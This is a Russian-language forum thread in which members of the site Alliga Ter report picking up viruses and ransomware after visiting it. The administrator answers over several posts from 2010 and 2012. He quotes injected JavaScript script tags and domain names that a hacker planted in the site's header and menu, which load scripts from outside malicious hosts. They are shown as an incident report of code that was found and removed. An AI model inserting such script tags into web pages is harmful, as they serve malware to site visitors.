| Вирусы. Трояны |
| системасоюза | Дата: Среда, 24 Фев 2010, 17:07 | Сообщение # 1 |
 Человек: Император
Общество: Бакалавр
Деятельность: 321
Награды: 6
Репутация: -1
Статус: Offline
| Уважаемый администратор! Что у нас происходит? Сначала перестали приходить уведомления на почту. А теперь я уже 4 день подряд ловлю вирусы, причем сразу же после того, как посещаю сайт Alliga Ter. А сканировать качественно очень долго. И минус в том, что летит интернет вообще. Это что? и как долго? Прошу вас ответить мне непосредственно на почту. С уважением Система Союза
|
| |
| | |
| alligater | Дата: Среда, 24 Фев 2010, 21:37 | Сообщение # 2 |
 Человек: Admin
Общество: Администраторы
Деятельность: 1061
Награды: 4
Репутация: 4
Статус: Offline
| системасоюза, спасибо за сообщение. Будем искать троянов. Если можно, скажите на каких страницах появляется вирус.
|
| |
| | |
| NinaD | Дата: Четверг, 25 Фев 2010, 18:59 | Сообщение # 3 |
 Человек: Основатель
Общество: Бакалавр
Деятельность: 135
Награды: 2
Репутация: 0
Статус: Offline
| Извините, alligater, я тоже видела такую картинку, когда входишь в Аллига Тер первый раз в течение суток с одного компьютера, но не смогла зафиксировать ее: в виде игры "Как стать миллионером" в круге и с краным крестиком. Жму крестик, в новом окне Оперы что-то открывается, я само новое окно закрываю. И дальше я нормально нахожусь в Аллига Тере в течение дня, даже если уже вышла и снова зашла. Один раз (может на прошлой неделе?) тоже Касперский выдавал у меня отчет о пойманных вирусах, пролечила.
Система Союза не может сказать, на какой странице у нее происходит подцепление вирусов.
Кстати, вчера вечером стали приходить сообщения с форумов и о личных сообщениях недельной давности 
|
| |
| | |
| Пятнистая_Кошка | Дата: Четверг, 25 Фев 2010, 20:02 | Сообщение # 4 |
 Человек: Космонавт
Общество: Магистр
Деятельность: 4020
Награды: 9
Репутация: 46
Статус: Offline
|  Quote (NinaD) Кстати, вчера вечером стали приходить сообщения с форумов и о личных сообщениях недельной давности Да-да-да, мне тоже...
Крим - це Україна.
|
| |
| | |
| alligater | Дата: Понедельник, 01 Мар 2010, 13:54 | Сообщение # 5 |
|
Человек: Admin
Общество: Администраторы
Деятельность: 1061
Награды: 4
Репутация: 4
Статус: Offline
| NinaD, Спасибо!
Это новая флеш-реклама. Её видят только пользователи России. Флэш-реклама убрана. Возвращение к старому баннеру.
Этот баннер так же видят только в России. Пишите если что-то не так. Quote (NinaD) Кстати, вчера вечером стали приходить сообщения с форумов и о личных сообщениях недельной давности
Это связано с железом uCoz, на котором часто проводят тех. работы для развития сервера. Всем спасибо!   Весна! |
| |
| | |
| Ananda | Дата: Понедельник, 01 Мар 2010, 17:03 | Сообщение # 6 |
 Человек: Основатель
Общество: Бакалавр
Деятельность: 118
Награды: 2
Репутация: 1
Статус: Offline
| alligater, а у нас, россиян, нельзя убрать? 
|
| |
| | |
| alligater | Дата: Воскресенье, 07 Мар 2010, 20:54 | Сообщение # 7 |
|
Человек: Admin
Общество: Администраторы
Деятельность: 1061
Награды: 4
Репутация: 4
Статус: Offline
| Ananda, позже. Ныне средства с данной рекламы идут на оплату интернета.
|
| |
| | |
| Пятнистая_Кошка | Дата: Среда, 04 Апр 2012, 06:31 | Сообщение # 8 |
|
Человек: Космонавт
Общество: Магистр
Деятельность: 4020
Награды: 9
Репутация: 46
Статус: Offline
| Quote (donna_amata Дата: Вторник, Вчера, 14:44 | Сообщение # 31) Хотела сегодня утром написать отчет, и бац вирус поймала на этом сайте. Он заблокировал всю систему, ничего даже нажать было нельзя - троян-вымогатель, пришлось чистить...
Крим - це Україна.
|
| |
| | |
| alligater | Дата: Вторник, 10 Апр 2012, 19:54 | Сообщение # 9 |
|
Человек: Admin
Общество: Администраторы
Деятельность: 1061
Награды: 4
Репутация: 4
Статус: Offline
| 3-4 апреля хакер установили в шапке хедера, в меню сайта и по телу Аллига Тэр несколько ссылок-троянов. В инете подобные действия блокируют в течении 24 часов. Уже через час данные ссылки-сайты были блокированы. На Аллига эти ссылки в дальнейшем приводили в 1,5-2,5 более медленной загрузке web-страницы и перерасходу трафика как для Аллига Тэр, так и для пользователей.
Данные ссылки удалены:
newrest.game-host.org
abcopliter.servebbs.net
Так же есть подозрение на ссылки
i4.ytimg .com
s.ytimg .com
которые не загружаются или тянут трафик.
Т.е., в настоящее время страницы сайта загружаются быстрее, чем несколько дней назад.
Причина доступа хакера в действия админа выяснена.
|
| |
| | |
| alligater | Дата: Понедельник, 23 Апр 2012, 11:29 | Сообщение # 10 |
|
Человек: Admin
Общество: Администраторы
Деятельность: 1061
Награды: 4
Репутация: 4
Статус: Offline
| Хакер вновь установил вирусные коды:
script language=JavaScript src=http://e1q.4pu.com/?in=23599> и RCODE4.
Коды удалены.
|
| |
| | |
| Колёсико | Дата: Понедельник, 23 Апр 2012, 13:10 | Сообщение # 11 |
 Человек: Феодал
Общество: Бакалавр
Деятельность: 207
Награды: 2
Репутация: 1
Статус: Offline
| Трояны по-прежнему беспокоят. Сайт может блокироваться как потенциально опасный,если с 7-ки заходить.
Тебе это снится.
|
| |
| | |
| alligater | Дата: Понедельник, 23 Апр 2012, 15:16 | Сообщение # 12 |
|
Человек: Admin
Общество: Администраторы
Деятельность: 1061
Награды: 4
Репутация: 4
Статус: Offline
| Еще найдены только что установленные два новых несанкционированных скрипта:
script language=JavaScript src=http://tryoutmycock.ddns.name/?in=23599> script language=JavaScript src=http://tryoutmycock.ddns.name/?in=23599> Снова установлен $RCODE_4$
script language=JavaScript src=http://e1q.4pu.com/?in=23599>
Как же это делается?
|
| |
| |
|
·
[ Новые сообщения ·
Участники ·
Правила форума ·
Поиск ·
RSS ]
